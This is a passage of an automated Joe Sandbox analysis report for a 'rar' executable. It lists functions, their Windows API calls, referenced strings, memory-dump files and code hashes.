GetDiskFreeSpaceExW.KERNEL32(00007FF695CF2684), ref: 00007FF695CF319F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction ID: df9881ad3cffcdef2ec582a997222d1e6f692de4457b735fc5e1aeed274b2893
Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction Fuzzy Hash: 1101402262868187EB70DB15E4513EA73E0FB84B45F805175E68CC6688DF7CDA09CF44

Function 00007FF695D36130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D362AD

Strings

INF, xrefs: 00007FF695D361A3
NAN, xrefs: 00007FF695D36191
NAN(SNAN), xrefs: 00007FF695D361C5
inf, xrefs: 00007FF695D361B6
nan(snan), xrefs: 00007FF695D361D0
NAN(IND), xrefs: 00007FF695D361DB
nan(ind), xrefs: 00007FF695D361E6
nan, xrefs: 00007FF695D36198

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction ID: 3d0e749830c0e11538370a3d644d1553a4dae4e796f40be3aefb9c77eb449f46
Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction Fuzzy Hash: 7741CF32B09B4589EB24CF64E8517E933E4EB04B88F015276EE4C83B94DE3CD929C348

Function 00007FF695CE7988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00000000,00000100,?,?,00000002,00007FF695CE7892), ref: 00007FF695CE79BC
GetStdHandle.KERNEL32 ref: 00007FF695CE79CA
GetConsoleMode.KERNEL32 ref: 00007FF695CE79E0
GetConsoleMode.KERNEL32 ref: 00007FF695CE79EE
SetConsoleMode.KERNEL32 ref: 00007FF695CE79FC
SetConsoleMode.KERNEL32 ref: 00007FF695CE7A0A
ReadConsoleW.KERNEL32 ref: 00007FF695CE7A24
SetConsoleMode.KERNEL32 ref: 00007FF695CE7A3A
SetConsoleMode.KERNEL32 ref: 00007FF695CE7A47

Part of subcall function 00007FF695CE82E4: fflush.LIBCMT ref: 00007FF695CE832F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Console$Mode$Handle$Readfflush
String ID:
API String ID: 1039280553-0
Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction ID: c2fccb6c60c790acaecf5e532328d7ab731a231220ee399101948950d0cf7b5c
Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction Fuzzy Hash: 6B218026A1864287EA209F25A80813967A1FB89FA0F141274EE4A577B5DE3CEC4AC744

Function 00007FF695D20140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D20211
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D20222
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D2022D
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D2023E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D203D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D203E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D203EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D20400

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction ID: b93ea8073a7e63ad0d6df79ab0c776375c8356ffc6fd6e35d24c625cc21f98f0
Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction Fuzzy Hash: B8819162A0D68285EB31DA11E4403B963D0EF44F94F585272DA4DC7A99DF7CEC4B8788

Function 00007FF695CDC468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CDC7AE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CDC97F
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CDC9DC

Strings

;%u, xrefs: 00007FF695CDC79E
xc%u, xrefs: 00007FF695CDC9CC
x%u, xrefs: 00007FF695CDC96F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%u$x%u$xc%u
API String ID: 233258989-2277559157
Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction ID: ce1fd5d52a5d48f4e83ea4a6929fe19a1e628c8bb006857fb896b50ea941efa0
Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction Fuzzy Hash: 6102B222B4C68281EA34EA31A5453FE63E1EF41B80F44117BDA8EC7792DF7DE9498345

Function 00007FF695CF1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF695CF1694
GetShortPathNameW.KERNEL32 ref: 00007FF695CF16B5

Part of subcall function 00007FF695D1DAC0: CompareStringW.KERNEL32(?,?,?,?,?,?,00007FF695D04C1E,?,?,?,?,?,?,?,00007FF695D29706), ref: 00007FF695D1DADF

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF175F
MoveFileW.KERNEL32 ref: 00007FF695CF17CD
MoveFileW.KERNEL32 ref: 00007FF695CF1815

Strings

rtmp%d, xrefs: 00007FF695CF1755

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortStringswprintf
String ID: rtmp%d
API String ID: 2308737092-3303766350
Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction ID: 4374395a270561333ade450c1683b3d2f908161c2f4b9b4d1103d5b0778e73de
Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction Fuzzy Hash: A0516F22A1868685EA70AF21D8405FE23A0FF44F84F551176DD0DDBADADF3CDA09D744

Function 00007FF695D1B650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FF695D1B66A
CloseHandle.KERNEL32 ref: 00007FF695D1B685
CreateEventW.KERNEL32 ref: 00007FF695D1B699
GetLastError.KERNEL32 ref: 00007FF695D1B6A6
CloseHandle.KERNEL32 ref: 00007FF695D1B6C0

Strings

rar -ioff, xrefs: 00007FF695D1B65C, 00007FF695D1B68B

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseCreateEventHandle$ErrorLast
String ID: rar -ioff
API String ID: 4151682896-4089728129
Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction ID: bb58405a8a58351d80babe631e67942b57b8d9fc107a27a3f57e1fef47894fe7
Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction Fuzzy Hash: 4F016D24A19A06C7FB38DFB0A85413523E1EF54F01F4466B1D84ECB2E0DE3C6C4C8689

Function 00007FF695D1B470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF695D1B488
GetProcAddress.KERNEL32 ref: 00007FF695D1B4A0
GetProcAddress.KERNEL32 ref: 00007FF695D1B4D5

Strings

SetDefaultDllDirectories, xrefs: 00007FF695D1B4CB
kernel32, xrefs: 00007FF695D1B481
SetDllDirectoryW, xrefs: 00007FF695D1B496

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 667068680-1824683568
Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction ID: abe532a7a7c67b6d020677055ac9f388026016a2150315f68458c53a96f85905
Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction Fuzzy Hash: E1F01925A09B4681EA24DF51F85407527E0EF49FC0B4CA6B0DD5E8B7A4EE2CE84DC308

Function 00007FF695D31ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D31B14
_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D31E39
_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D320BE

Strings

+, xrefs: 00007FF695D31B96
-, xrefs: 00007FF695D31B8B

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: +$-
API String ID: 3215553584-2137968064
Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction ID: 2e898fb06a09fa6e2ae1fc45cf157bb588792659560ebbac7256392d69e3666f
Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction Fuzzy Hash: 7512B426E0954345FB349A94D4442B862D5EB41FACFC853B2C69AC36C8DF3DEE8D8308

Function 00007FF695CEE49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

BackupRead.KERNEL32 ref: 00007FF695CEE523
BackupRead.KERNEL32 ref: 00007FF695CEE572
BackupSeek.KERNEL32 ref: 00007FF695CEE5CB
BackupRead.KERNEL32 ref: 00007FF695CEE641
BackupSeek.KERNEL32 ref: 00007FF695CEE679
wcschr.LIBVCRUNTIME ref: 00007FF695CEE6B4

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Backup$Read$Seek$wcschr
String ID:
API String ID: 2092471728-0
Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction ID: c3fd8b4d7fe6715bc63505deff8cce8ce5fd57158433835b53aaee3cddcfd3f0
Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction Fuzzy Hash: 2B514D32608A45C6EB30DF25E44116AB7E4FB89B94F500279EA9D87B98DF3CDD49CB00

Function 00007FF695D1BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695CF6754: GetVersionExW.KERNEL32 ref: 00007FF695CF6785

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF695D1BCEF
FileTimeToSystemTime.KERNEL32 ref: 00007FF695D1BCFB
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF695D1BD0B
SystemTimeToFileTime.KERNEL32 ref: 00007FF695D1BD19
SystemTimeToFileTime.KERNEL32 ref: 00007FF695D1BD27
FileTimeToSystemTime.KERNEL32 ref: 00007FF695D1BD68

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction ID: 0f67b1caf78282930e87bfeff7a7b4bbce50e17f7ff007a35a91148e9288a28d
Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction Fuzzy Hash: 1D5149B2B146518FEB68CFB4D4405AC37B1F708B88B50512ADE0E97B98DE38E959CB44

Function 00007FF695D1C254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF695D1C2B8

Part of subcall function 00007FF695CF6754: GetVersionExW.KERNEL32 ref: 00007FF695CF6785

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF695D1C2DA
FileTimeToSystemTime.KERNEL32 ref: 00007FF695D1C2E6
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF695D1C2F6
SystemTimeToFileTime.KERNEL32 ref: 00007FF695D1C304
SystemTimeToFileTime.KERNEL32 ref: 00007FF695D1C312

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction ID: 7b097dc181e537721466b6b8184b1e806278f70274201d5be951e9594ed27c00
Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction Fuzzy Hash: B7314D63B146518EFB14CFB4D8901BC37B0FB08B48B54512ADE0E97AA8EF38D899C344

Function 00007FF695D0EB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695CD72C4: new.LIBCMT ref: 00007FF695CD73DE

new.LIBCMT ref: 00007FF695D0EBB4

Strings

exe, xrefs: 00007FF695D0ECDC
rebuilt., xrefs: 00007FF695D0ECA3
sfx, xrefs: 00007FF695D0ECC9
rar, xrefs: 00007FF695D0ECF2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
